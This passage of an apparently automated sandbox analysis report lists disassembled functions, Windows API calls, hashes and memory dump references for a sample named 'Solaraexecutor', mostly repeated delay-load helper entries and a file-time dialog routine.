                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: b2af935cb1c45525d177f289c8375ec4b7e26694301d460d3e8abf0da17db7fb
                                                      • Instruction ID: cb03d391ee5a890cefbd60cc47dc38c8d353b73e788d345cbd0e65637f4e4c5e
                                                      • Opcode Fuzzy Hash: b2af935cb1c45525d177f289c8375ec4b7e26694301d460d3e8abf0da17db7fb
                                                      • Instruction Fuzzy Hash: C5A001E66AD252BC350862516D16C3B435DC4C6B67B30A92EFC56A54D1A880594A18B2
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E3FC
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 9d1fcdc377fea2dac100d3cb4535220d0cfc14bc2bed79c2eb94740d5149b0aa
                                                      • Instruction ID: cb03d391ee5a890cefbd60cc47dc38c8d353b73e788d345cbd0e65637f4e4c5e
                                                      • Opcode Fuzzy Hash: 9d1fcdc377fea2dac100d3cb4535220d0cfc14bc2bed79c2eb94740d5149b0aa
                                                      • Instruction Fuzzy Hash: C5A001E66AD252BC350862516D16C3B435DC4C6B67B30A92EFC56A54D1A880594A18B2
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E3FC
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 58eb026611be39792f5b29788488e6873593f1716a98326873509714d555bd6e
                                                      • Instruction ID: cb03d391ee5a890cefbd60cc47dc38c8d353b73e788d345cbd0e65637f4e4c5e
                                                      • Opcode Fuzzy Hash: 58eb026611be39792f5b29788488e6873593f1716a98326873509714d555bd6e
                                                      • Instruction Fuzzy Hash: C5A001E66AD252BC350862516D16C3B435DC4C6B67B30A92EFC56A54D1A880594A18B2
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E3FC
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 41698b11a4ac66483fb188a232f5649fe86614f9d40176b5c562a5c7e47da03d
                                                      • Instruction ID: cb03d391ee5a890cefbd60cc47dc38c8d353b73e788d345cbd0e65637f4e4c5e
                                                      • Opcode Fuzzy Hash: 41698b11a4ac66483fb188a232f5649fe86614f9d40176b5c562a5c7e47da03d
                                                      • Instruction Fuzzy Hash: C5A001E66AD252BC350862516D16C3B435DC4C6B67B30A92EFC56A54D1A880594A18B2
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E3FC
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: d84b584306c185f33ea0f96f01f5b4d4ae98a55808757b0464e25fba3225faa7
                                                      • Instruction ID: cb03d391ee5a890cefbd60cc47dc38c8d353b73e788d345cbd0e65637f4e4c5e
                                                      • Opcode Fuzzy Hash: d84b584306c185f33ea0f96f01f5b4d4ae98a55808757b0464e25fba3225faa7
                                                      • Instruction Fuzzy Hash: C5A001E66AD252BC350862516D16C3B435DC4C6B67B30A92EFC56A54D1A880594A18B2
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E580
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: eb967410cbdb315b29b01a4162dbf1f6656fefa0b63e029dc0f83cc9619b4f1d
                                                      • Instruction ID: 26f472a964b116ff21422915e892299454d9ae8a98328d3f2c4364c3cb51b64b
                                                      • Opcode Fuzzy Hash: eb967410cbdb315b29b01a4162dbf1f6656fefa0b63e029dc0f83cc9619b4f1d
                                                      • Instruction Fuzzy Hash: AAA022C2ABC222FC300822A02C03C3B030CC0C0F2AB30A82EFC02C00C0BC800C0C08B0
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E580
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 24425f817a059f3903975516da11849a30337aeeda8df346a35292b5d9e33267
                                                      • Instruction ID: 26f472a964b116ff21422915e892299454d9ae8a98328d3f2c4364c3cb51b64b
                                                      • Opcode Fuzzy Hash: 24425f817a059f3903975516da11849a30337aeeda8df346a35292b5d9e33267
                                                      • Instruction Fuzzy Hash: AAA022C2ABC222FC300822A02C03C3B030CC0C0F2AB30A82EFC02C00C0BC800C0C08B0
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E51F
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 3af7ae3191d6791d15ba2c81fea186a2c4b9f2490d23228004e4cab31a26c808
                                                      • Instruction ID: 92df94bf9f9ea678311f617a3c7ac60e6ab30e66253402106adbc86cae8b7a0a
                                                      • Opcode Fuzzy Hash: 3af7ae3191d6791d15ba2c81fea186a2c4b9f2490d23228004e4cab31a26c808
                                                      • Instruction Fuzzy Hash: 62A002D6ABD642FC390862556D17C3F071DC4C6F6AB70A92EFC66C44D1BC805D8D58B1
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E51F
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: d822c6d2b0ee98062688af04019c031638b76c0b9e98710f1188e069ef60c056
                                                      • Instruction ID: 92df94bf9f9ea678311f617a3c7ac60e6ab30e66253402106adbc86cae8b7a0a
                                                      • Opcode Fuzzy Hash: d822c6d2b0ee98062688af04019c031638b76c0b9e98710f1188e069ef60c056
                                                      • Instruction Fuzzy Hash: 62A002D6ABD642FC390862556D17C3F071DC4C6F6AB70A92EFC66C44D1BC805D8D58B1
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E51F
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 326c1c0a1b1c8c543c40e62799c6184da5367b95f85c7711ecc0125f2093c3d0
                                                      • Instruction ID: 92df94bf9f9ea678311f617a3c7ac60e6ab30e66253402106adbc86cae8b7a0a
                                                      • Opcode Fuzzy Hash: 326c1c0a1b1c8c543c40e62799c6184da5367b95f85c7711ecc0125f2093c3d0
                                                      • Instruction Fuzzy Hash: 62A002D6ABD642FC390862556D17C3F071DC4C6F6AB70A92EFC66C44D1BC805D8D58B1
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E580
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 702a46c3689ed956f88ba93b550d5820eef6613781a85594a3a52a8b207dff80
                                                      • Instruction ID: fbd097e43eab35832096ba01b79944182cbb4b89dfde5e69db91a44ad06e7103
                                                      • Opcode Fuzzy Hash: 702a46c3689ed956f88ba93b550d5820eef6613781a85594a3a52a8b207dff80
                                                      • Instruction Fuzzy Hash: D5A011C2AA8220BC300822A02C02C3B030CC0C0B2AB30A22EFC00800C0A8800A0808B0
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E51F
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 3c5c790dca0c490c1c6e308c65f7cbfe269ba3565bf376c840764a12fdfd66b1
                                                      • Instruction ID: 92df94bf9f9ea678311f617a3c7ac60e6ab30e66253402106adbc86cae8b7a0a
                                                      • Opcode Fuzzy Hash: 3c5c790dca0c490c1c6e308c65f7cbfe269ba3565bf376c840764a12fdfd66b1
                                                      • Instruction Fuzzy Hash: 62A002D6ABD642FC390862556D17C3F071DC4C6F6AB70A92EFC66C44D1BC805D8D58B1
                                                      APIs
                                                      • SetEndOfFile.KERNELBASE(?,00D2903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00D29F0C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: File
                                                      • String ID:
                                                      • API String ID: 749574446-0
                                                      • Opcode ID: 327efdbb39b88d906d715a571bac65214abb15aa9b2858e942281df745e41fb4
                                                      • Instruction ID: 3689a9fc65495929363e8b868f42fce914e278432765d31609c34917f97deeb1
                                                      • Opcode Fuzzy Hash: 327efdbb39b88d906d715a571bac65214abb15aa9b2858e942281df745e41fb4
                                                      • Instruction Fuzzy Hash: 74A0113008030A8A8E002B30CA0800E3B20EB20BC230002A8A00ACA0A2CB22880B8A20
                                                      APIs
                                                      • SetCurrentDirectoryW.KERNELBASE(?,00D3AE72,C:\Users\user\Desktop,00000000,00D6946A,00000006), ref: 00D3AC08
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory
                                                      • String ID:
                                                      • API String ID: 1611563598-0
                                                      • Opcode ID: 19f97476cafa38b3f2eb7894ea2fa87eec78cfa4355f09a66d9aac7fd6afe2ef
                                                      • Instruction ID: 56dfe3249be80939e4a68b64b35566a10ddf30779b220ff029b46fffaaa64ce8
                                                      • Opcode Fuzzy Hash: 19f97476cafa38b3f2eb7894ea2fa87eec78cfa4355f09a66d9aac7fd6afe2ef
                                                      • Instruction Fuzzy Hash: FFA01130200B008B82000B328F0AA0EBAAAAFA2B82F00C028A800C0230CB30C820AA20
                                                      APIs
                                                      • CloseHandle.KERNELBASE(000000FF,?,?,00D295D6,?,?,?,?,?,00D52641,000000FF), ref: 00D2963B
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      • Opcode ID: 6868e2e5784c82a8797ea7dd5bcc0841a520f337206b59289b9a645df451a4e6
                                                      • Instruction ID: d69f068937ff6fe424d88ffa4af5a6eb354886e0a4cab2f831a63258e6b33bbb
                                                      • Opcode Fuzzy Hash: 6868e2e5784c82a8797ea7dd5bcc0841a520f337206b59289b9a645df451a4e6
                                                      • Instruction Fuzzy Hash: C2F0E930081B259FDB308A24D468792F7E8AB3232AF081B1ED0E2429E0D371658D9A60
                                                      APIs
                                                        • Part of subcall function 00D21316: GetDlgItem.USER32(00000000,00003021), ref: 00D2135A
                                                        • Part of subcall function 00D21316: SetWindowTextW.USER32(00000000,00D535F4), ref: 00D21370
                                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00D3C2B1
                                                      • EndDialog.USER32(?,00000006), ref: 00D3C2C4
                                                      • GetDlgItem.USER32(?,0000006C), ref: 00D3C2E0
                                                      • SetFocus.USER32(00000000), ref: 00D3C2E7
                                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 00D3C321
                                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00D3C358
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00D3C36E
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D3C38C
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D3C39C
                                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D3C3B8
                                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D3C3D4
                                                      • _swprintf.LIBCMT ref: 00D3C404
                                                        • Part of subcall function 00D24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D240A5
                                                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00D3C417
                                                      • FindClose.KERNEL32(00000000), ref: 00D3C41E
                                                      • _swprintf.LIBCMT ref: 00D3C477
                                                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 00D3C48A
                                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00D3C4A7
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00D3C4C7
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D3C4D7
                                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D3C4F1
                                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D3C509
                                                      • _swprintf.LIBCMT ref: 00D3C535
                                                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00D3C548
                                                      • _swprintf.LIBCMT ref: 00D3C59C
                                                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 00D3C5AF
                                                        • Part of subcall function 00D3AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D3AF35
                                                        • Part of subcall function 00D3AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00D5E72C,?,?), ref: 00D3AF84
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
